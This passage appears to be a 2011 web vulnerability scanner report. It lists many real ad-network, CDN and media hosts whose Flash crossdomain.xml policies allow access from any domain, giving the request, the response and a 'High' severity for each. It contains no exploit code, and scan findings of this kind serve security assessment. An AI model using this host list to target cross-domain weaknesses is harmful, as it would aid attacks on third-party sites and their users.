Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.ok.facebook.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:57:50 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.6. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 19 Jul 2011 14:58:32 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.8. http://admeld.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:43:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:43:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.9. http://ads.as4x.tmcs.ticketmaster.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.as4x.tmcs.ticketmaster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.as4x.tmcs.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: Apache
Last-Modified: Tue, 17 Nov 2009 02:41:10 GMT
ETag: "23ca27-138-478880f095d80"
Accept-Ranges: bytes
Content-Length: 312
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

5.10. http://ads.undertone.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Jul 2011 22:26:02 GMT
ETag: "53000b-fc-4a7e6c8eaf280"
Content-Type: text/xml
Date: Tue, 19 Jul 2011 20:42:55 GMT
Content-Length: 252
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.11. http://adx.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:26:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:11 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.12. http://api.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Tue, 12 Apr 2011 10:51:02 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 118
Date: Tue, 19 Jul 2011 20:43:17 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.13. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Wed, 20 Jul 2011 14:26:45 GMT
Date: Tue, 19 Jul 2011 14:26:45 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.14. http://b3.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.15. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205345000"
Last-Modified: Thu, 15 Jul 2010 14:49:05 GMT
Content-Type: application/xml
Content-Length: 384
Date: Tue, 19 Jul 2011 18:37:29 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.16. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 19 Jul 2011 20:43:12 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.17. http://c.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 14:24:25 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.18. http://cache.specificmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:20 GMT
Server: PWS/1.7.2.3
X-Px: ms jfk-agg-n63 ( jfk-agg-n58), ht-d jfk-agg-n58.panthercdn.com
ETag: "e8a17-110-476483d0fa140"
Cache-Control: max-age=604800
Expires: Tue, 26 Jul 2011 01:38:10 GMT
Age: 68770
Content-Length: 272
Content-Type: application/xml
Last-Modified: Mon, 19 Oct 2009 11:42:21 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.19. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Tue, 19 Jul 2011 20:43:08 GMT
Date: Tue, 19 Jul 2011 20:43:08 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.20. http://creatives.as4x.tmcs.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://creatives.as4x.tmcs.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: creatives.as4x.tmcs.net

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Nov 2009 02:41:10 GMT
ETag: "23ca27-138-478880f095d80"
Accept-Ranges: bytes
Content-Length: 312
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

5.21. http://d.agkn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1308732886000"
Last-Modified: Wed, 22 Jun 2011 08:54:46 GMT
Content-Type: application/xml
Content-Length: 219
Date: Tue, 19 Jul 2011 20:44:50 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...

5.22. http://dev.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:45 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.23. http://ecn.api.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.api.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.api.tiles.virtualearth.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 13 Jul 2011 18:25:34 GMT
Accept-Ranges: bytes
ETag: "89839418a41cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:42 GMT
Connection: close
Content-Length: 207

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.24. http://ecn.dev.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:43 GMT
Content-Length: 277
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.25. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 78401
Date: Tue, 19 Jul 2011 12:24:12 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.26. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 78331
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.27. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 118980
Date: Tue, 19 Jul 2011 12:24:13 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.28. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 81536
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.29. http://external.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.30. http://farecastcom.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farecastcom.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farecastcom.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:00:29 GMT
Server: Omniture DC/2.0.0
xserver: www261
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.31. http://files.livedrive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://files.livedrive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: files.livedrive.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 11 Mar 2011 17:51:48 GMT
Accept-Ranges: bytes
ETag: "b0ee90fe14e0cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Served-By: 103
Date: Tue, 19 Jul 2011 12:24:11 GMT
Connection: close
Content-Length: 141

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

5.32. http://g-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:38 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.33. http://img1.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:55 GMT
Content-Length: 177
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.34. http://img2.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img2.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 153211
Date: Tue, 19 Jul 2011 12:24:00 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Sun, 31 Jul 2011 17:50:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.35. http://img3.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

